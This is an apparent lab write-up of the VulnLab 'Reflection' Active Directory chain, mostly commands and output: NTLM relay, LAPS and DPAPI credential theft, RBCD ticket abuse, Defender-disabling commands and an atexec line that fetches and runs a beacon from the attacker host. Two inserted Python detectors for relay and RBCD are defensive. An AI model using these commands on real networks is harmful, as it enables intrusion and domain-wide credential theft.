VulnLab Reflection

Reflection

Recon

10.10.226.101 -> [53,88,135,139,389,445,464,593,636,1433,3268,3269,3389,5985,9389]
10.10.226.102 -> [135,445,1433,3389,5985]
10.10.226.103 -> [135,445,3389,7680]
└─$ nmap -sC -sV -p53,88,135,139,389,445,464,593,636,1433,3268,3269,3389,5985,9389 10.10.226.101
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-16 00:48 +05
Nmap scan report for 10.10.226.101
Host is up (0.090s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-15 19:47:26Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: reflection.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info: 
|   10.10.226.101:1433: 
|     Target_Name: REFLECTION
|     NetBIOS_Domain_Name: REFLECTION
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: reflection.vl
|     DNS_Computer_Name: dc01.reflection.vl
|     DNS_Tree_Name: reflection.vl
|_    Product_Version: 10.0.20348
| ms-sql-info: 
|   10.10.226.101:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-15T19:44:05
|_Not valid after:  2055-01-15T19:44:05
|_ssl-date: 2025-01-15T19:48:12+00:00; -1m20s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: reflection.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: REFLECTION
|   NetBIOS_Domain_Name: REFLECTION
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: reflection.vl
|   DNS_Computer_Name: dc01.reflection.vl
|   DNS_Tree_Name: reflection.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-01-15T19:47:32+00:00
| ssl-cert: Subject: commonName=dc01.reflection.vl
| Not valid before: 2025-01-14T19:41:08
|_Not valid after:  2025-07-16T19:41:08
|_ssl-date: 2025-01-15T19:48:12+00:00; -1m20s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-01-15T19:47:36
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: mean: -1m20s, deviation: 0s, median: -1m20s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.56 seconds
└─$ nmap -sC -sV -p135,445,1433,3389,5985 10.10.226.102
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-16 00:50 +05
Nmap scan report for 10.10.226.102
Host is up (0.089s latency).

PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
445/tcp  open  microsoft-ds?
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info: 
|   10.10.226.102:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2025-01-15T19:49:45+00:00; -1m20s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-15T19:41:57
|_Not valid after:  2055-01-15T19:41:57
| ms-sql-ntlm-info: 
|   10.10.226.102:1433: 
|     Target_Name: REFLECTION
|     NetBIOS_Domain_Name: REFLECTION
|     NetBIOS_Computer_Name: MS01
|     DNS_Domain_Name: reflection.vl
|     DNS_Computer_Name: ms01.reflection.vl
|     DNS_Tree_Name: reflection.vl
|_    Product_Version: 10.0.20348
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=ms01.reflection.vl
| Not valid before: 2025-01-14T19:41:23
|_Not valid after:  2025-07-16T19:41:23
| rdp-ntlm-info: 
|   Target_Name: REFLECTION
|   NetBIOS_Domain_Name: REFLECTION
|   NetBIOS_Computer_Name: MS01
|   DNS_Domain_Name: reflection.vl
|   DNS_Computer_Name: ms01.reflection.vl
|   DNS_Tree_Name: reflection.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-01-15T19:49:05+00:00
|_ssl-date: 2025-01-15T19:49:45+00:00; -1m20s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-01-15T19:49:07
|_  start_date: N/A
|_clock-skew: mean: -1m20s, deviation: 0s, median: -1m20s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.52 seconds
└─$ nmap -sC -sV -p135,445,3389,7680 10.10.226.103
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-16 00:51 +05
Nmap scan report for 10.10.226.103
Host is up (0.090s latency).

PORT     STATE    SERVICE       VERSION
135/tcp  open     msrpc         Microsoft Windows RPC
445/tcp  open     microsoft-ds?
3389/tcp open     ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: REFLECTION
|   NetBIOS_Domain_Name: REFLECTION
|   NetBIOS_Computer_Name: WS01
|   DNS_Domain_Name: reflection.vl
|   DNS_Computer_Name: ws01.reflection.vl
|   DNS_Tree_Name: reflection.vl
|   Product_Version: 10.0.19041
|_  System_Time: 2025-01-15T19:50:29+00:00
|_ssl-date: 2025-01-15T19:51:09+00:00; -1m20s from scanner time.
| ssl-cert: Subject: commonName=ws01.reflection.vl
| Not valid before: 2025-01-14T19:43:13
|_Not valid after:  2025-07-16T19:43:13
7680/tcp filtered pando-pub
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: mean: -1m20s, deviation: 0s, median: -1m20s
| smb2-time: 
|   date: 2025-01-15T19:50:30
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.56 seconds

MS01.reflection.vl

Let’s check if anonymous login is enabled

└─$ nxc smb targets.txt -u 'Guest' -p '' --shares
SMB         10.10.226.101   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB         10.10.226.103   445    WS01             [*] Windows 10 / Server 2019 Build 19041 x64 (name:WS01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB         10.10.226.101   445    DC01             [-] reflection.vl\Guest: STATUS_ACCOUNT_DISABLED 
SMB         10.10.226.103   445    WS01             [-] reflection.vl\Guest: STATUS_ACCOUNT_DISABLED 
SMB         10.10.226.102   445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB         10.10.226.102   445    MS01             [+] reflection.vl\Guest: 
SMB         10.10.226.102   445    MS01             [*] Enumerated shares
SMB         10.10.226.102   445    MS01             Share           Permissions     Remark
SMB         10.10.226.102   445    MS01             -----           -----------     ------
SMB         10.10.226.102   445    MS01             ADMIN$                          Remote Admin
SMB         10.10.226.102   445    MS01             C$                              Default share
SMB         10.10.226.102   445    MS01             IPC$            READ            Remote IPC
SMB         10.10.226.102   445    MS01             staging         READ            staging environment
Running nxc against 3 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

It’s enabled on MS01. There’s a staging share, which contains credentials.

└─$ smbclient.py Guest:''@10.10.226.102               
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
Type help for list of commands
# use staging
# ls
drw-rw-rw-          0  Thu Jun  8 17:21:36 2023 .
drw-rw-rw-          0  Wed Jun  7 23:41:25 2023 ..
-rw-rw-rw-         50  Thu Jun  8 17:21:49 2023 staging_db.conf
# cat staging_db.conf
user=web_staging
password=<REDACTED>
db=staging
# 

Credentials are valid

└─$ nxc mssql 10.10.226.102 -u 'web_staging' -p '<REDACTED>' --local-auth
MSSQL       10.10.226.102   1433   MS01             [*] Windows Server 2022 Build 20348 (name:MS01) (domain:reflection.vl)
MSSQL       10.10.226.102   1433   MS01             [+] MS01\web_staging:<REDACTED>

We can check the databases. There is a staging database with a users table that contains creds, yet they don’t work.

└─$ mssqlclient.py web_staging:<REDACTED>@10.10.200.150                                      
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (web_staging  guest@master)> enum_db
name      is_trustworthy_on   
-------   -----------------   
master                    0   

tempdb                    0   

model                     0   

msdb                      1   

staging                   0   

SQL (web_staging  guest@master)> use staging
ENVCHANGE(DATABASE): Old Value: master, New Value: staging
INFO(MS01\SQLEXPRESS): Line 1: Changed database context to 'staging'.
SQL (web_staging  dbo@staging)> Select name from sys.tables;
name    
-----   
users   

SQL (web_staging  dbo@staging)> select * from users;
id   username   password        
--   --------   -------------   
 1   b'dev01'   b'Initial123'   

 2   b'dev02'   b'Initial123'   

SQL (web_staging  dbo@staging)>

We can’t execute commands. We can also try retrieving the service account’s hash, but unfortunately it’s not crackable.

SQL (web_staging  dbo@staging)> xp_dirtree \\10.8.4.147\test
subdirectory   depth   file   
------------   -----   ----   
└─$ sudo responder -I tun0
<SNIP>
[SMB] NTLMv2-SSP Hash     : svc_web_staging::REFLECTION:f2c0bcc138c1aff1:F8B7C1CBE0160425CAA5D30719123F95:010100000000000000BA1A1F7168DB0170C214A86BB1B2870000000002000800530037004E004A0001001E00570049004E002D00360045003100390045004E005700360052004100320004003400570049004E002D00360045003100390045004E00570036005200410032002E00530037004E004A002E004C004F00430041004C0003001400530037004E004A002E004C004F00430041004C0005001400530037004E004A002E004C004F00430041004C000700080000BA1A1F7168DB01060004000200000008003000300000000000000000000000003000000EF520D614332B83B1EFC4A3C44DD1FFA643728B6DB750976B483A4A85973F6B0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E0038002E0034002E003100340037000000000000000000                                                                                                                                                                                                                      

We can try relaying the authentication to the other hosts, since SMB signing is not enforced (signing:False in the nxc output above).

└─$ ntlmrelayx.py -tf targets.txt -smb2support --no-http-server -i
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

<SNIP>

And we receive sessions

└─$ ntlmrelayx.py -tf targets.txt -smb2support --no-http-server -i

<SNIP>
[*] Started interactive SMB client shell via TCP on 127.0.0.1:11000
[]
[*] SMBD-Thread-4 (process_request_thread): Connection from REFLECTION/SVC_WEB_STAGING@10.10.200.150 controlled, attacking target smb://10.10.200.150
[-] Authenticating against smb://10.10.200.150 as REFLECTION/SVC_WEB_STAGING FAILED
[*] Received connection from REFLECTION/svc_web_staging at MS01, connection will be relayed after re-authentication
[ParseResult(scheme='smb', netloc='REFLECTION\\SVC_WEB_STAGING@10.10.200.150', path='', params='', query='', fragment='')]
[*] SMBD-Thread-6 (process_request_thread): Connection from REFLECTION/SVC_WEB_STAGING@10.10.200.150 controlled, attacking target smb://10.10.200.151
[*] Authenticating against smb://10.10.200.151 as REFLECTION/SVC_WEB_STAGING SUCCEED
[*] Started interactive SMB client shell via TCP on 127.0.0.1:11001
<SNIP>
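
A defender-side view of the relay above, as an added example that is not part of the original write-up: the target records a relayed NTLM logon with the victim's workstation name but the relay's source address, so checking 4624 events against a host inventory exposes it. The events and the inventory are constructed; the addresses are the ones that appear in this post.

```python
import ipaddress
from dataclasses import dataclass

# Constructed inventory (NetBIOS name -> expected IPv4). The DC01 and MS01
# addresses are the ones shown in the nxc output in this post; a real
# deployment would build this from DNS or a CMDB.
INVENTORY = {"DC01": "10.10.200.149", "MS01": "10.10.200.150"}


@dataclass(frozen=True)
class Finding:
    logged_on: str      # host that recorded the 4624
    account: str
    claimed_host: str   # WorkstationName carried inside the NTLM message
    source_ip: str      # address the connection actually came from
    reason: str


def _norm_ip(raw):
    """Return a plain address string, unwrapping ::ffff:a.b.c.d; None if unusable."""
    try:
        ip = ipaddress.ip_address(raw.strip())
    except ValueError:          # "-", empty string, garbage
        return None
    mapped = getattr(ip, "ipv4_mapped", None)
    return str(mapped or ip)


def detect_relay(events, inventory=INVENTORY):
    """Flag NTLM network logons whose workstation name and source IP disagree."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4624 or str(ev.get("LogonType")) != "3":
            continue
        if ev.get("AuthenticationPackageName", "").strip().upper() != "NTLM":
            continue
        account = ev.get("TargetUserName", "")
        claimed = ev.get("WorkstationName", "").strip().upper()
        source = _norm_ip(ev.get("IpAddress", ""))
        if account.upper() == "ANONYMOUS LOGON" or not claimed or source is None:
            continue
        expected = inventory.get(claimed)
        if expected == source:
            continue                      # name and address agree
        reason = ("workstation name not in inventory" if expected is None
                  else f"{claimed} should be {expected}")
        findings.append(Finding(ev.get("Computer", "?"), account,
                                claimed, source, reason))
    return findings


# Constructed 4624 records (only the EventData fields the check needs).
SAMPLE_EVENTS = [
    # Relayed logon: MS01's service account, arriving from 10.8.4.147.
    {"EventID": 4624, "Computer": "dc01.reflection.vl", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "TargetUserName": "svc_web_staging",
     "WorkstationName": "MS01", "IpAddress": "10.8.4.147"},
    # Ordinary NTLM logon from the real MS01, logged in IPv4-mapped form.
    {"EventID": 4624, "Computer": "dc01.reflection.vl", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "TargetUserName": "abbie.smith",
     "WorkstationName": "MS01", "IpAddress": "::ffff:10.10.200.150"},
    # Kerberos logon: outside the scope of this check.
    {"EventID": 4624, "Computer": "dc01.reflection.vl", "LogonType": 3,
     "AuthenticationPackageName": "Kerberos", "TargetUserName": "dorothy.rose",
     "WorkstationName": "-", "IpAddress": "10.8.4.147"},
]

if __name__ == "__main__":
    for finding in detect_relay(SAMPLE_EVENTS):
        print(finding)
```

Multi-homed hosts and NAT produce the same mismatch, so the inventory needs every legitimate address of each host. Requiring SMB signing on all three machines removes the relay path itself.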

DC01 has a prod share with creds, but there is nothing on WS01.

└─$ nc 127.0.0.1 11000                              
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
prod
SYSVOL
# use prod
# ls
drw-rw-rw-          0  Wed Jun  7 23:44:26 2023 .
drw-rw-rw-          0  Wed Jun  7 23:43:22 2023 ..
-rw-rw-rw-         45  Thu Jun  8 17:24:39 2023 prod_db.conf
# cat prod_db.conf
user=web_prod
password=<REDACTED>
db=prod
# 

We can try authenticating against the targets. It seems we can log in to MSSQL on DC01.

┌──(kali㉿kali)-[~/vulnlab/chains/reflection]
└─$ nxc mssql targets.txt -u 'web_prod' -p '<REDACTED>' --local-auth
MSSQL       10.10.200.149   1433   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:reflection.vl)
MSSQL       10.10.200.149   1433   DC01             [+] DC01\web_prod:<REDACTED> 
MSSQL       10.10.200.150   1433   MS01             [*] Windows Server 2022 Build 20348 (name:MS01) (domain:reflection.vl)
MSSQL       10.10.200.150   1433   MS01             [-] MS01\web_prod:<REDACTED> (Login failed for user 'web_prod'. Please try again with or without '--local-auth')
Running nxc against 3 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

Let’s check the content. The database structure is identical to MS01’s, and we acquire new credentials. We can’t execute anything. We can also retrieve the hash, but it’s not crackable.

└─$ mssqlclient.py web_prod:'<REDACTED>'@10.10.200.149                      
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (web_prod  guest@master)> enum_db
name     is_trustworthy_on   
------   -----------------   
master                   0   

tempdb                   0   

model                    0   

msdb                     1   

prod                     0   

SQL (web_prod  guest@master)> use prod
ENVCHANGE(DATABASE): Old Value: master, New Value: prod
INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'prod'.
SQL (web_prod  dbo@prod)> select name from sys.tables
name    
-----   
users   

SQL (web_prod  dbo@prod)> select * from users;
id   name              password            
--   ---------------   -----------------   
 1   b'abbie.smith'    b'<REDACTED>'   

 2   b'dorothy.rose'   b'<REDACTED>'

Both creds are valid

└─$ nxc smb 10.10.200.149 -u users.txt -p passwords.txt --continue-on-success --no-bruteforce
SMB         10.10.200.149   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB         10.10.200.149   445    DC01             [+] reflection.vl\abbie.smith:<REDACTED> 
SMB         10.10.200.149   445    DC01             [+] reflection.vl\dorothy.rose:<REDACTED>

Let’s enumerate the domain with BloodHound

└─$ bloodhound-python -d 'reflection.vl' -u 'abbie.smith' -p '<REDACTED>' -c all -ns 10.10.200.149  --zip
INFO: Found AD domain: reflection.vl
<SNIP>

Looks like abbie.smith has GenericAll over MS01

We could try an RBCD or Shadow Credentials attack, but neither is possible here, since MachineAccountQuota is 0 and there is no ADCS.

└─$ nxc ldap 10.10.225.133 -u 'abbie.smith' -p '<REDACTED>' -M maq
LDAP        10.10.225.133   389    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:reflection.vl)
LDAP        10.10.225.133   389    DC01             [+] reflection.vl\abbie.smith:<REDACTED> 
MAQ         10.10.225.133   389    DC01             [*] Getting the MachineAccountQuota
MAQ         10.10.225.133   389    DC01             MachineAccountQuota: 0

Another option is to check LAPS (BloodHound showed a GPO). GenericAll grants the right to read attributes, and since the LAPS password is stored in an LDAP attribute, we can read it.

└─$ nxc ldap 10.10.225.133 -u 'abbie.smith' -p '<REDACTED>' -M laps
LDAP        10.10.225.133   389    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:reflection.vl)
LDAP        10.10.225.133   389    DC01             [+] reflection.vl\abbie.smith:<REDACTED> 
LAPS        10.10.225.133   389    DC01             [*] Getting LAPS Passwords
LAPS        10.10.225.133   389    DC01             Computer:MS01$ User:                Password:<REDACTED>

Now we have admin session on

└─$ evil-winrm -i 10.10.225.134 -u Administrator -p '<REDACTED>'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

WS01.reflection.vl

After dumping creds from MS01, we have new creds for svc_web_staging

└─$ secretsdump.py ./administrator:'<REDACTED>'@10.10.225.134
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf0093534e5f21601f5f509571855eeee
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
<SNIP>
REFLECTION\MS01$:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xb7ad02ee5577322cc2a2e096b7bab17101a4f9a7
dpapi_userkey:0x9de553e3a73ece7cff322d722fc9fbdfe4fd78cc
[*] NL$KM 
 0000   C0 BE 31 EA 49 A4 51 79  67 62 D2 F1 C2 22 1C BE   ..1.I.Qygb..."..
 0010   CE 86 94 CF D5 32 5D 73  32 64 85 4C 37 81 7B AE   .....2]s2d.L7.{.
 0020   0C D1 61 83 A3 65 91 58  D6 F0 B3 17 47 5F 64 93   ..a..e.X....G_d.
 0030   A4 AC D7 4F E7 E4 A5 EE  E8 6D BE 93 7A CF 35 77   ...O.....m..z.5w
NL$KM:c0be31ea49a451796762d2f1c2221cbece8694cfd5325d733264854c37817bae0cd16183a3659158d6f0b317475f6493a4acd74fe7e4a5eee86dbe937acf3577
[*] _SC_MSSQL$SQLEXPRESS 
REFLECTION\svc_web_staging:<REDACTED>
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

We notice the Georgia.Price user in the dump, who has GenericAll over WS01. Let’s check if it’s possible to get creds.

We can use SharpDPAPI to check whether there are credentials stored in DPAPI, and we successfully retrieve them.

We can also use nxc to do it

└─$ nxc smb 10.10.225.134 -u Administrator -p '<REDACTED>' --dpapi --local-auth
SMB         10.10.225.134   445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:MS01) (signing:False) (SMBv1:False)
SMB         10.10.225.134   445    MS01             [+] MS01\Administrator:<REDACTED> (Pwn3d!)
SMB         10.10.225.134   445    MS01             [*] Collecting DPAPI masterkeys, grab a coffee and be patient...
SMB         10.10.225.134   445    MS01             [+] Got 7 decrypted masterkeys. Looting secrets...
SMB         10.10.225.134   445    MS01             [SYSTEM][CREDENTIAL] Domain:batch=TaskScheduler:Task:{013CD3ED-72CB-4801-99D7-8E7CA1F7E370} - REFLECTION\Georgia.Price:<REDACTED>
<SNIP>

We can’t add a new computer, but we have a hash for MS01, so we can perform RBCD.

└─$ rbcd.py -delegate-from 'ms01$' -delegate-to 'ws01$' -dc-ip 10.10.225.133 -action 'write' 'reflection.vl/Georgia.Price:<REDACTED>'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] ms01$ can now impersonate users on ws01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     MS01$        (S-1-5-21-3375389138-1770791787-1490854311-1104)
└─$ rbcd.py -delegate-to 'ws01$' -dc-ip 10.10.225.133 -action 'read' 'reflection.vl/Georgia.Price:<REDACTED>'       
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Accounts allowed to act on behalf of other identity:
[*]     MS01$        (S-1-5-21-3375389138-1770791787-1490854311-1104)

Let’s get a ticket

└─$ getST.py -dc-ip 10.10.225.133 -spn www/ws01 'reflection.vl/ms01$' -impersonate administrator -hashes :<REDACTED>
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@www_ws01@REFLECTION.VL.ccache
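
What the RBCD write and the S4U request look like from the domain controller's logs, as an added example that is not part of the original write-up: it pairs a 5136 directory change on msDS-AllowedToActOnBehalfOfOtherIdentity with later 4769 tickets for the same host that carry a transited service. All events, timestamps and the WS01 distinguished name are constructed, and 5136 is only logged when directory-change auditing and a SACL cover computer objects.

```python
from datetime import datetime, timedelta

RBCD_ATTR = "msds-allowedtoactonbehalfofotheridentity"
VALUE_ADDED = "%%14674"   # 5136 OperationType code for "value added"


def _when(ev):
    return datetime.fromisoformat(ev["TimeCreated"])


def _first_rdn(dn):
    """'CN=WS01,CN=Computers,...' -> 'WS01' (escaped commas are not handled)."""
    return dn.split(",", 1)[0].split("=", 1)[-1].strip()


def rbcd_writes(events):
    """5136 events that add a value to the RBCD attribute of a computer object."""
    return [ev for ev in events
            if ev.get("EventID") == 5136
            and ev.get("ObjectClass", "").lower() == "computer"
            and ev.get("AttributeLDAPDisplayName", "").lower() == RBCD_ATTR
            and ev.get("OperationType") == VALUE_ADDED]


def s4u2proxy_tickets(events, target_host):
    """4769 events for target_host's account that list a transited service."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4769:
            continue
        if ev.get("ServiceName", "").rstrip("$").upper() != target_host.upper():
            continue
        if ev.get("TransmittedServices", "-").strip() in ("", "-"):
            continue                      # ordinary ticket, no delegation
        hits.append(ev)
    return hits


def correlate(events, window=timedelta(hours=24)):
    """One alert per RBCD write; 'high' if a delegated ticket follows in window."""
    alerts = []
    for write in rbcd_writes(events):
        target = _first_rdn(write["ObjectDN"])
        start = _when(write)
        tickets = [t for t in s4u2proxy_tickets(events, target)
                   if start <= _when(t) <= start + window]
        alerts.append({
            "target": target,
            "writer": write.get("SubjectUserName", "?"),
            "written_at": write["TimeCreated"],
            "delegated_via": sorted({t["TransmittedServices"] for t in tickets}),
            "severity": "high" if tickets else "medium",
        })
    return alerts


# Constructed records; only the EventData fields the correlation needs.
SAMPLE_EVENTS = [
    {"EventID": 5136, "TimeCreated": "2025-01-15T20:10:00+00:00",
     "SubjectUserName": "Georgia.Price", "ObjectClass": "computer",
     "ObjectDN": "CN=WS01,CN=Computers,DC=reflection,DC=vl",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity",
     "OperationType": "%%14674"},
    {"EventID": 4769, "TimeCreated": "2025-01-15T20:12:30+00:00",
     "TargetUserName": "administrator@REFLECTION.VL", "ServiceName": "WS01$",
     "TransmittedServices": "ms01$@REFLECTION.VL"},
    # Ordinary service ticket for WS01: no transited service, ignored.
    {"EventID": 4769, "TimeCreated": "2025-01-15T20:15:00+00:00",
     "TargetUserName": "abbie.smith@REFLECTION.VL", "ServiceName": "WS01$",
     "TransmittedServices": "-"},
    # Unrelated attribute change on the same object, ignored.
    {"EventID": 5136, "TimeCreated": "2025-01-15T20:20:00+00:00",
     "SubjectUserName": "Georgia.Price", "ObjectClass": "computer",
     "ObjectDN": "CN=WS01,CN=Computers,DC=reflection,DC=vl",
     "AttributeLDAPDisplayName": "description", "OperationType": "%%14674"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```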

Dump the secrets

└─$ KRB5CCNAME=administrator@cifs_ws01.reflection.vl@REFLECTION.VL.ccache secretsdump.py -k -no-pass ws01.reflection.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x7ed33ac4a19a5ea7635d402e58c0055f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
<SNIP>
REFLECTION\WS01$:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
[*] DefaultPassword 
reflection.vl\Rhys.Garner:<REDACTED>
<SNIP>
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry

To get a shell, we can disable Defender or set an exclusion path with atexec.py

Set-MPPreference -DisableRealTimeMonitoring $true
Set-MPPreference -DisableIOAVProtection $true
Set-MPPreference -DisableIntrusionPreventionSystem $true
Set-MpPreference -ExclusionPath C:\\

Or use an evasive payload

└─$ atexec.py -hashes :<REDACTED> ./administrator@ws01.reflection.vl  'powershell.exe -c "iwr http://10.8.4.147:8000/demon.exe -outfile c:\windows\tasks\demon.exe;Start-process c:\windows\tasks\demon.exe"'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[!] This will work ONLY on Windows >= Vista
[*] Creating task \ujGdRUCo
[*] Running task \ujGdRUCo
[*] Deleting task \ujGdRUCo
[*] Attempting to read ADMIN$\Temp\ujGdRUCo.tmp
[*] Attempting to read ADMIN$\Temp\ujGdRUCo.tmp

We get our system beacon

DC01.reflection.vl

When we dumped creds from DC01, we got Rhys.Garner:<REDACTED> creds. But there’s also a user dom_rgarner, who is a Domain Admin. It’s quite possible that this is the same user.

Let’s test if there’s password reuse

└─$ nxc smb 10.10.225.133 -u 'dom_rgarner' -p '<REDACTED>'     
SMB         10.10.225.133   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB         10.10.225.133   445    DC01             [+] reflection.vl\dom_rgarner:<REDACTED> (Pwn3d!)

Dump the domain

└─$ secretsdump.py reflection.vl/dom_rgarner:'<REDACTED>'@10.10.225.133
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xfcb176024780bc221b4c7b3f35e16dfd
